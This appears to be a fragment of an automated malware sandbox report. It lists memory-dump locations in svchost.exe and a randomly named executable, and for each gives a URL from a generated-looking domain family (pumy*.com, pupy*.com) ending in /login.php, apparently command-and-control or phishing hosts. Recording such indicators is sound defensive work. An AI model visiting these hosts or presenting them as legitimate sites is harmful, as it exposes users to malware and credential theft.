Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307945417.0000000008615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pujyxyl.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumybal.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumybuq.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumycug.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumydoq.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumygil.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumyjev.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumymap.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumymuv.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000095F8000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000721000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.0000000008405000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008790000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E05000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pumypog.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumytol.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393409003.000000000338E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3347345159.000000000338D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302596386.000000000865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumytup.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumywov.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumywug.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumyxep.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157288878.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157020892.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194320231.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202674715.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151945828.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157370436.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pumyxiv.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.000000000968F000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009290000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000721000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.0000000008405000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008790000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupybul.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404361246.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783207555.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupycop.com/H
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupycuv.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupygel.com/login.php
Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2753175286.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748730470.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupyjap.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupyjuv.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296191981.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupylaq.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupylug.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321538396.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupymyp.com/login.php
